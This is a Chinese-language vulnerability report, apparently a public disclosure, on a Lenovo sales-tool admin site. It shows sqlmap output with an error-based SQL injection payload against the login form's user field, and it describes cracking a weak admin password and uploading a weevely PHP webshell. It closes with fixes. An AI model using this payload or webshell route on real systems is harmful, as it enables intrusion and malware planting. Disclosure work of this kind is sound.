联想某助销工具后台注入及get shell – 网站安全

联想产品多业务广，旗下有很多销售业务相关的管理后台，然而部分这类网站的安全状况堪忧。

网站：http://www.lenovostoreapp.com/

后台登陆处存在post注入：http://www.lenovostoreapp.com/admin/index.php

抓post包扔进sqlmap：
 

sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Place: POST
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: user=A' AND (SELECT 1917 FROM(SELECT COUNT(*),CONCAT(0x3a68726e3a,(SELECT (CASE WHEN (1917=1917) THEN 1 ELSE 0 END)),0x3a7461763a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bwuX'='bwuX&upass=A&button=++%E7%99%BB%E5%BD%95++

跑出一个叫lenovoStoreApp的数据库，里头有8个表，手到擒来地找到管理密码（出于对该网站的尊重和保护，详细步骤略去）

反查到md5，密码弱到不堪入目，就是不用注入都能轻易跑出来的那种弱密码。

登陆后台，点击添加

编辑器界面有上传的地方，对文件类型毫无防御，轻易上shell
 

用的是weevely的php马
 

查看服务器信息
 

另外可以看到同服务器上的其他联想业务网站，数量还不少，搞搞旁注还是可以的。
 

友情检测，不深入。如无意外，shell已删除。

PS：出于对厂商的尊重，码打得有点多了，各位看官见谅。

修复方案：

1.post注入，就加上你们业务网站广泛使用的防注入程序就可以了。

2.弱密码，网站的用户数又不多，这个好处理吧。

3.上传文件处一定要检测文件类型

还是那句话，联想业务广，但不能忽略这类后台网站。

危害：

1.该站就有提供产品展示APP的下载，只要把APP换掉，大量种马，后果不堪设想。

2.shel都轻易拿到了，提权旁站一条龙还远吗？